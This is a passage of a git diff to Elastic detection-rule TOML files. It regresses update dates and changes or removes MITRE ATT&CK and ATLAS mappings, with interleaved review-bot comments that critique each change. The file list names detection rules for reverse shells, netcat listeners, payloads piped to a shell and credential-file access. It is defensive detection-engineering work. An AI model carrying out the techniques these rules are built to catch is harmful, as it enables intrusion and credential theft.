...ge_escalation_uac_bypass_com_ieinstal.toml | 56 +++- ...n_uac_bypass_com_interface_icmluautil.toml | 55 +++- ...alation_uac_bypass_diskcleanup_hijack.toml | 58 +++- ...escalation_uac_bypass_dll_sideloading.toml | 40 +-- ...ge_escalation_uac_bypass_event_viewer.toml | 24 +- ...ege_escalation_uac_bypass_mock_windir.toml | 40 +-- ...scalation_uac_bypass_winfw_mmc_hijack.toml | 40 +-- ...tion_unusual_parentchild_relationship.toml | 40 ++- ...n_unusual_svchost_childproc_childless.toml | 30 +- ...rivilege_escalation_via_ppid_spoofing.toml | 10 +- ...ilege_escalation_via_rogue_named_pipe.toml | 8 +- .../privilege_escalation_via_token_theft.toml | 30 +- ...on_windows_service_via_unusual_client.toml | 30 +- ...collection_archive_data_zip_imageload.toml | 8 +- ...ction_common_compressed_archived_file.toml | 47 ++- ...llection_microsoft_purview_dlp_signal.toml | 23 +- ...microsoft_purview_insider_risk_signal.toml | 23 +- .../collection_posh_compression.toml | 30 +- ...ommand_and_control_bitsadmin_activity.toml | 30 +- ...llama_model_download_untrusted_source.toml | 43 ++- ...access_entra_id_risk_detection_signal.toml | 30 +- ...ntial_access_iis_apppoolsa_pwd_appcmd.toml | 14 +- ...al_access_mdmp_file_unusual_extension.toml | 32 +- .../defense_evasion_dll_hijack.toml | 10 +- ...evasion_dotnet_clickonce_dfsvc_netcon.toml | 16 +- ...fense_evasion_download_susp_extension.toml | 47 ++- ...cution_via_visualstudio_prebuildevent.toml | 18 +- .../defense_evasion_generic_deletion.toml | 10 +- ...fense_evasion_injection_from_msoffice.toml | 59 +++- ...defense_evasion_masquerading_browsers.toml | 29 +- .../defense_evasion_masquerading_vlc_dll.toml | 29 +- ...ense_evasion_masquerading_windows_dll.toml | 34 ++- ...ion_masquerading_windows_system32_exe.toml | 29 +- ...soft_security_compliance_admin_signal.toml | 43 +-- ...fense_evasion_msdt_suspicious_diagcab.toml | 32 +- ...ense_evasion_outlook_suspicious_child.toml | 52 +++- ..._obfuscation_proportion_special_chars.toml | 30 +- 
..._evasion_powershell_clear_logs_script.toml | 24 +- ...nse_evasion_service_disabled_registry.toml | 25 +- ...defense_evasion_service_path_registry.toml | 33 +- .../defense_evasion_services_exe_path.toml | 34 ++- .../defense_evasion_unsigned_bits_client.toml | 13 +- .../defense_evasion_write_dac_access.toml | 42 +-- .../discovery_capnetraw_capability.toml | 25 +- .../discovery_generic_account_groups.toml | 14 +- ...ry_kernel_module_enumeration_via_proc.toml | 9 +- ...ubectl_workload_and_cluster_discovery.toml | 12 +- .../discovery_linux_modprobe_enumeration.toml | 44 +-- .../discovery_linux_sysctl_enumeration.toml | 30 +- ...ery_linux_system_owner_user_discovery.toml | 8 +- .../discovery_net_share_discovery_winlog.toml | 27 +- rules_building_block/discovery_net_view.toml | 29 +- .../discovery_of_domain_groups.toml | 8 +- .../discovery_posh_generic.toml | 57 ++-- .../discovery_posh_password_policy.toml | 33 +- ..._post_exploitation_external_ip_lookup.toml | 12 +- ...ery_potential_memory_seeking_activity.toml | 14 +- ...y_process_discovery_via_builtin_tools.toml | 13 +- ...ote_system_discovery_commands_windows.toml | 13 +- .../discovery_security_software_wmic.toml | 19 +- ...discovery_suspicious_proc_enumeration.toml | 10 +- .../discovery_system_network_connections.toml | 8 +- .../discovery_system_service_discovery.toml | 8 +- .../discovery_win_network_connections.toml | 19 +- ...d_identity_protection_risk_detections.toml | 48 +-- ...execution_aws_lambda_function_updated.toml | 31 +- ...ution_github_new_event_action_for_pat.toml | 29 +- ...n_github_new_repo_interaction_for_pat.toml | 29 +- ..._github_new_repo_interaction_for_user.toml | 29 +- .../execution_github_repo_created.toml | 29 +- ...n_github_repo_interaction_from_new_ip.toml | 29 +- .../execution_linux_segfault.toml | 10 +- .../execution_mcp_server_child_process.toml | 16 +- ...ution_settingcontent_ms_file_creation.toml | 48 +-- ...execution_unsigned_service_executable.toml | 34 ++- 
.../impact_github_pat_access_revoked.toml | 15 +- ...ss_anomalous_rsc_flight_data_patterns.toml | 28 +- ..._access_github_new_ip_address_for_pat.toml | 34 +-- ...ss_microsoft_air_investigation_signal.toml | 26 +- ...cess_microsoft_defender_alerts_signal.toml | 23 +- ...t_defender_threat_intelligence_signal.toml | 32 +- ...ft_purview_security_compliance_signal.toml | 38 ++- ...cess_new_okta_authentication_behavior.toml | 13 +- ...cess_okta_admin_console_login_failure.toml | 26 +- rules_building_block/lateral_movement_at.toml | 44 ++- .../lateral_movement_posh_winrm_activity.toml | 38 +-- ...movement_unusual_process_sql_accounts.toml | 32 +- .../lateral_movement_wmic_remote.toml | 48 +-- ...e_aws_iam_login_profile_added_to_user.toml | 21 +- .../persistence_github_new_pat_for_user.toml | 34 ++- ...github_new_user_added_to_organization.toml | 13 +- ...e_iam_instance_request_to_iam_service.toml | 31 +- .../persistence_startup_folder_lnk.toml | 12 +- .../persistence_transport_agent_exchange.toml | 24 +- ...ce_web_server_potential_sql_injection.toml | 66 +++- ...sistence_web_server_sus_file_creation.toml | 44 ++- ..._escalation_sts_getsessiontoken_abuse.toml | 35 ++- 1271 files changed, 26216 insertions(+), 13548 deletions(-) create mode 100644 rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml create mode 100644 rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml create mode 100644 rules/cross-platform/execution_d4c_k8s_mda_direct_interactive_kubernetes_api_request_by_usual_utilities.toml create mode 100644 rules/cross-platform/execution_d4c_k8s_mda_forbidden_direct_interactive_kubernetes_api_request.toml create mode 100644 rules/cross-platform/execution_d4c_k8s_mda_kubernetes_api_activity_by_unusual_utilities.toml create mode 100644 rules/cross-platform/execution_d4c_k8s_mda_service_account_token_access_followed_by_kubernetes_api_request.toml create mode 100644 
rules/cross-platform/execution_register_github_actions_runner.toml create mode 100644 rules/cross-platform/execution_revershell_via_shell_cmd.toml create mode 100644 rules/cross-platform/execution_sap_netweaver_jsp_webshell.toml create mode 100644 rules/cross-platform/execution_via_github_runner_with_runner_tracking_id_tampering_via_env_vars.toml create mode 100644 rules/integrations/cloud_defend/credential_access_collection_sensitive_files_compression_inside_a_container.toml create mode 100644 rules/integrations/cloud_defend/defense_evasion_file_creation_execution_deletion_cradle.toml create mode 100644 rules/integrations/cloud_defend/discovery_kubelet_certificate_file_access.toml create mode 100644 rules/integrations/cloud_defend/execution_direct_interactive_kubernetes_api_request.toml create mode 100644 rules/integrations/cloud_defend/execution_interactive_file_creation_in_system_binary_locations.toml create mode 100644 rules/integrations/cloud_defend/execution_netcat_listener_established_inside_a_container.toml create mode 100644 rules/integrations/cloud_defend/execution_payload_downloaded_and_piped_to_shell.toml create mode 100644 rules/integrations/cloud_defend/execution_potential_direct_kubelet_access_via_process_args.toml create mode 100644 rules/integrations/cloud_defend/execution_suspicious_file_made_executable_via_chmod_inside_a_container.toml create mode 100644 rules/integrations/cloud_defend/persistence_suspicious_echo_or_printf_execution.toml create mode 100644 rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml diff --git a/rules/apm/apm_403_response_to_a_post.toml b/rules/apm/apm_403_response_to_a_post.toml index 05b6e24dba3..ef503e3741b 100644 --- a/rules/apm/apm_403_response_to_a_post.toml +++ b/rules/apm/apm_403_response_to_a_post.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["apm"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ references = ["https://en.wikipedia.org/wiki/HTTP_403"] risk_score = 47 rule_id = "a87a4e42-1d82-44bd-b0bf-d9b7f91fb89e" severity = "medium" -tags = ["Tactic: Initial Access", "Data Source: APM", "Resources: Investigation Guide"] +tags = ["Data Source: APM", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -67,15 +67,3 @@ Web applications often use POST requests to handle data submissions securely. Ho - Review and update the web application firewall (WAF) rules to better detect and block unauthorized POST requests, ensuring that legitimate traffic is not affected. - If applicable, engage with the development team to conduct a security review of the application code to identify and fix any potential vulnerabilities that could be exploited by attackers.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/apm/apm_405_response_method_not_allowed.toml b/rules/apm/apm_405_response_method_not_allowed.toml index b46b5811271..1116968ca65 100644 --- a/rules/apm/apm_405_response_method_not_allowed.toml +++ b/rules/apm/apm_405_response_method_not_allowed.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["apm"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] 
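Review bot: The third hunk of apm_403_response_to_a_post.toml deletes the entire `[[rule.threat]]` block (T1190 Exploit Public-Facing Application under TA0001 Initial Access) while the first hunk moves `updated_date` backwards from 2026/03/23 to 2025/01/15, which is the signature of a stale branch being diffed against a newer base rather than an intended edit. A rule's `updated_date` should only advance when its content changes, and a 403-to-POST detection with no ATT&CK mapping at all loses the tactic context analysts pivot on during triage. If the removal is deliberate it needs a forward-dated `updated_date` and a reason in the description; otherwise rebase so these hunks disappear. The same regress-the-date-and-drop-the-mapping pattern repeats in the apm_405 and apm_sqlmap hunks that follow.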
@@ -25,7 +25,7 @@ references = ["https://en.wikipedia.org/wiki/HTTP_405"] risk_score = 47 rule_id = "75ee75d8-c180-481c-ba88-ee50129a6aef" severity = "medium" -tags = ["Tactic: Reconnaissance", "Data Source: APM", "Resources: Investigation Guide"] +tags = ["Data Source: APM", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -67,15 +67,3 @@ Web applications often restrict HTTP methods to protect resources, allowing only - Conduct a vulnerability assessment of the web application to identify and remediate any potential security weaknesses that could be exploited by unauthorized HTTP methods. - Document the incident, including the response actions taken, and update the incident response plan to improve future detection and response capabilities for similar threats.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/apm/apm_sqlmap_user_agent.toml b/rules/apm/apm_sqlmap_user_agent.toml index 264a4d2fa50..82c01caadac 100644 --- a/rules/apm/apm_sqlmap_user_agent.toml +++ b/rules/apm/apm_sqlmap_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["apm"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -25,7 +25,7 @@ references = ["http://sqlmap.org/"] risk_score = 47 rule_id = "d49cc73f-7a16-4def-89ce-9fc7127d7820" severity = "medium" -tags = ["Tactic: Reconnaissance", "Data Source: APM", "Resources: Investigation Guide"] +tags = ["Data Source: APM", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -68,20 +68,3 @@ Sqlmap is a widely-used open-source tool designed to automate the detection and - Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation. - Document the incident details and response actions taken for future reference and to enhance incident response procedures.""" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" - -[[rule.threat.technique.subtechnique]] -id = "T1595.002" -name = "Vulnerability Scanning" -reference = "https://attack.mitre.org/techniques/T1595/002/" - -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/cross-platform/command_and_control_common_llm_endpoint.toml b/rules/cross-platform/command_and_control_common_llm_endpoint.toml index 61c7d4276cc..8614a7cea40 100644 --- a/rules/cross-platform/command_and_control_common_llm_endpoint.toml +++ b/rules/cross-platform/command_and_control_common_llm_endpoint.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/01" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/10" [rule] 
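Review bot: The sqlmap hunk `@@ -68,20 +68,3 @@` removes the T1595.002 Vulnerability Scanning sub-technique along with its Reconnaissance tactic, and the tags hunk above drops `Tactic: Reconnaissance`, so the rule ends up with no framework mapping even though a sqlmap user-agent is about as unambiguous a T1595.002 signal as exists. Combined with `updated_date` stepping back to 2025/01/15 this reads like the pre-existing revision of the file resurfacing, not a reviewed change; confirm against the base branch before merging. If it is intended, keep at least `[[rule.threat.technique]]` / `id = "T1595"` with the TA0043 tactic so the alert still lands in reconnaissance coverage views.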
@@ -55,7 +55,18 @@ references = ["https://malpedia.caad.fkie.fraunhofer.de/details/py.lamehug"] risk_score = 47 rule_id = "4ae94fc1-f08f-419f-b692-053d28219380" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: AI Model Access", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -139,21 +150,16 @@ network where host.os.type in ("macos", "windows") and dns.question.name != null [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1102" name = "Web Service" reference = "https://attack.mitre.org/techniques/T1102/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATLAS" -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" diff --git a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml index 6ae2b55dc7b..5ba4932123d 100644 --- a/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml +++ b/rules/cross-platform/command_and_control_curl_wget_spawn_via_nodejs_parent.toml 
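Review bot: The last hunk of command_and_control_common_llm_endpoint.toml removes the MITRE ATLAS `AI Model Access` (AML.TA0000) threat entry and the tags hunk drops `Tactic: AI Model Access`, which throws away the one classification that distinguishes this rule from generic T1102 web-service C2 for a detection that is specifically about processes reaching LLM API endpoints. Keeping an ATLAS entry alongside the ATT&CK one is valid TOML here because each `[[rule.threat]]` carries its own `framework`. The `updated_date` also goes back from 2026/03/23 to 2026/02/10, so this looks like the older file version rather than a deliberate retraction; if it is deliberate, say why in the description, otherwise rebase.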
@@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/23" [rule] author = ["Elastic"] @@ -123,12 +123,17 @@ process.parent.name in ("node", "bun", "node.exe", "bun.exe") and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" + + [[rule.threat.technique.subtechnique]] + name = "Web Protocols" + id = "T1071.001" + reference = "https://attack.mitre.org/techniques/T1071/001/" diff --git a/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml b/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml index 6e96067d174..714d192afa5 100644 --- a/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml +++ b/rules/cross-platform/command_and_control_genai_process_suspicious_tld_connection.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/04" [rule] author = ["Elastic"] 
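Review bot: The curl/wget-via-node hunk replaces T1105 Ingress Tool Transfer with T1071.001 Web Protocols, but the behaviour the rule keys on (`process.parent.name in ("node", "bun", "node.exe", "bun.exe")` spawning curl/wget, per the hunk context) is a download tool being launched, which is exactly T1105; T1071.001 describes the C2 channel protocol and is a weaker fit. The replacement block is also indented and orders `name` before `id`, unlike every other `[[rule.threat]]` block in this diff, and `updated_date` steps back to 2025/12/23, so this may be the pre-rebase version of the file. Suggest keeping `id = "T1105"` / `name = "Ingress Tool Transfer"` (adding T1071.001 alongside if wanted) and normalising the block to the unindented, id-first layout used elsewhere.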
@@ -116,13 +116,19 @@ network where host.os.type in ("macos", "windows") and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml b/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml index ffaa3660825..47c2fb74836 100644 --- a/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml +++ b/rules/cross-platform/command_and_control_genai_process_unusual_domain.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" [rule] author = ["Elastic"] @@ -113,34 +113,22 @@ event.category:network and host.os.type:macos and event.action:connection_attemp [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0072" -name = "Reverse Shell" -reference = "https://atlas.mitre.org/techniques/AML.T0072/" - -[rule.threat.tactic] -id = "AML.TA0014" -name = "Command and Control" -reference = "https://atlas.mitre.org/tactics/AML.TA0014/" [rule.new_terms] field = "new_terms_fields" value = ["destination.domain"] 
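Review bot: The suspicious-TLD hunk adds the `T1071.004` DNS sub-technique, but the hunk context shows the rule is a `network where host.os.type in ("macos", "windows") and ...` connection rule keyed on the destination TLD, not on DNS-protocol traffic; T1071.004 means C2 carried over DNS, which is a different behaviour. Unless the query (outside the hunk) matches DNS events, the parent T1071 alone or `id = "T1071.001"` / `name = "Web Protocols"` / `reference = "https://attack.mitre.org/techniques/T1071/001/"` is the accurate mapping. The hunk also adds a stray trailing blank line after the tactic block and resets `updated_date` to the creation date 2025/12/04, which suggests an older revision surfacing.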
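Review bot: The unusual-domain hunk removes the MITRE ATLAS entry (AML.T0072 Reverse Shell under AML.TA0014 Command and Control), leaving only ATT&CK T1071.001, which drops the AI-specific classification for a rule that is explicitly about GenAI processes; both entries can coexist because each `[[rule.threat]]` declares its own `framework`, and the two tactics sharing the display name "Command and Control" is not a conflict across frameworks. If the removal is deliberate because AML.T0072 is a poor fit for a new-terms domain rule, state that in the description; the `updated_date` regression from 2026/03/23 to 2026/03/10 suggests it is instead the older file version.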
diff --git a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml index 843b580ae3b..0ca53756373 100644 --- a/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml +++ b/rules/cross-platform/command_and_control_suricata_elastic_defend_c2.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/10" integration = ["endpoint", "suricata"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/20" [rule] author = ["Elastic"] @@ -73,3 +73,10 @@ note = """## Triage and analysis - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. """ +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/cross-platform/command_and_control_tunnel_qemu.toml b/rules/cross-platform/command_and_control_tunnel_qemu.toml index 20b9041be9c..6a3c887e279 100644 --- a/rules/cross-platform/command_and_control_tunnel_qemu.toml +++ b/rules/cross-platform/command_and_control_tunnel_qemu.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/09" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -95,13 +95,14 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" +id = "T1219" +name = "Remote Access Tools" +reference = "https://attack.mitre.org/techniques/T1219/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + 
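Review bot: The suricata_elastic_defend_c2 hunk adds a tactic-only `[[rule.threat]]` block for TA0011, but the rule's `tags` line is outside the hunk, so it is worth verifying that it already carries `Tactic: Command and Control` — tags and threat tactics are expected to agree, and a tactic added here without the matching tag is the kind of drift an automated tag/tactic check will reject. A tactic with no technique is permitted, but a rule built on Suricata C2 signatures usually has at least `[[rule.threat.technique]]` / `id = "T1071"` / `name = "Application Layer Protocol"` available if the signatures it consumes are protocol-based. The `updated_date` moving back from 2026/03/23 to 2026/01/20 again points to a stale branch.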
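Review bot: The tunnel_qemu hunk swaps T1572 Protocol Tunneling for T1219 Remote Access Tools, which contradicts the rule's own premise — the file is command_and_control_tunnel_qemu and what it detects is QEMU being abused as a network tunnel, for which T1572 is the precise mapping; T1219 covers remote-administration software and would mis-bucket these alerts in coverage views. The `updated_date` is reset to the creation date 2026/02/09, so this looks like the first revision of the file reappearing rather than a deliberate re-mapping. Keep `id = "T1572"` / `name = "Protocol Tunneling"` / `reference = "https://attack.mitre.org/techniques/T1572/"`, and drop the trailing blank line the hunk adds after the tactic block.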
diff --git a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml index cce002926ea..70427bd61ba 100644 --- a/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml +++ b/rules/cross-platform/credential_access_genai_process_sensitive_file_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/10" [rule] author = ["Elastic"] @@ -57,7 +57,21 @@ references = [ risk_score = 73 rule_id = "c0136397-f82a-45e5-9b9f-a3651d77e21a" severity = "high" -tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0085", "Mitre Atlas: T0085.001", "Mitre Atlas: T0055"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Collection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0085", + "Mitre Atlas: T0085.001", + "Mitre Atlas: T0055", +] timestamp_override = "event.ingested" type = "eql" 
@@ -125,51 +139,26 @@ file where event.action in ("open", "creation", "modification") and event.outcom [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" -[[rule.threat.technique.subtechnique]] -id = "T1555.001" -name = "Keychain" -reference = "https://attack.mitre.org/techniques/T1555/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1555.003" -name = "Credentials from Web Browsers" -reference = "https://attack.mitre.org/techniques/T1555/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" -[[rule.threat.technique.subtechnique]] -id = "T1546.004" -name = "Unix Shell Configuration Modification" -reference = "https://attack.mitre.org/techniques/T1546/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + diff --git a/rules/cross-platform/credential_access_gitleaks_execution.toml b/rules/cross-platform/credential_access_gitleaks_execution.toml index 85e8dd9bffd..f4efcf94595 100644 --- a/rules/cross-platform/credential_access_gitleaks_execution.toml +++ b/rules/cross-platform/credential_access_gitleaks_execution.toml 
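Review bot: The threat hunk of credential_access_genai_process_sensitive_file_access.toml removes T1552.001 Credentials In Files, T1555.001 Keychain and T1555.003 Credentials from Web Browsers and replaces the Persistence/T1546.004 entry with Collection/T1005, yet the hunk context shows the query still matches `event.action in ("open", "creation", "modification")` — modification of shell configuration files is exactly T1546.004 and reading credential files is T1552.001, so the mapping gets coarser while the detection logic does not. The tags hunk above does retag Persistence → Collection, so tags and threat stay consistent, but the precision loss should be justified rather than implied. Given `updated_date` moves back from 2026/03/23 to 2026/03/10, this is more likely the older revision than an intended change.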
@@ -2,7 +2,7 @@ creation_date = "2025/11/28" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/28" [rule] author = ["Elastic"] @@ -99,14 +99,14 @@ process.name : ("gitleaks.exe", "gitleaks") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" +[[rule.threat.technique]] +id = "T1555" +name = "Credentials from Password Stores" +reference = "https://attack.mitre.org/techniques/T1555/" [rule.threat.tactic] id = "TA0006" diff --git a/rules/cross-platform/credential_access_trufflehog_execution.toml b/rules/cross-platform/credential_access_trufflehog_execution.toml index 358ef937467..b6faa0d1aee 100644 --- a/rules/cross-platform/credential_access_trufflehog_execution.toml +++ b/rules/cross-platform/credential_access_trufflehog_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/26" [rule] author = ["Elastic"] 
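Review bot: The gitleaks hunk maps the rule to T1003 OS Credential Dumping, which is wrong for this tool: gitleaks scans repositories and files for embedded secrets, which is T1552 Unsecured Credentials / T1552.001 Credentials In Files — the mapping the hunk removes — not extraction from LSASS, SAM or similar OS stores. Mis-mapping to T1003 routes these alerts into credential-dumping coverage and inflates that technique's hit count. Restore `id = "T1552"` / `name = "Unsecured Credentials"` with the T1552.001 sub-technique; T1555 Credentials from Password Stores can stay only if this rule is meant to cover password-store files, which is not evident from the query context `process.name : ("gitleaks.exe", "gitleaks")`.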
@@ -101,14 +101,14 @@ process.args == "--json" and process.args == "filesystem"
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
+id = "T1003"
+name = "OS Credential Dumping"
+reference = "https://attack.mitre.org/techniques/T1003/"
-[[rule.threat.technique.subtechnique]]
-id = "T1552.001"
-name = "Credentials In Files"
-reference = "https://attack.mitre.org/techniques/T1552/001/"
+[[rule.threat.technique]]
+id = "T1555"
+name = "Credentials from Password Stores"
+reference = "https://attack.mitre.org/techniques/T1555/"
 [rule.threat.tactic]
 id = "TA0006"
diff --git a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml
index 408663c99c1..150a6573e2d 100644
--- a/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml
+++ b/rules/cross-platform/defense_evasion_deleting_websvr_access_logs.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/03"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -86,18 +86,14 @@ file where event.type == "deletion" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1070"
 name = "Indicator Removal"
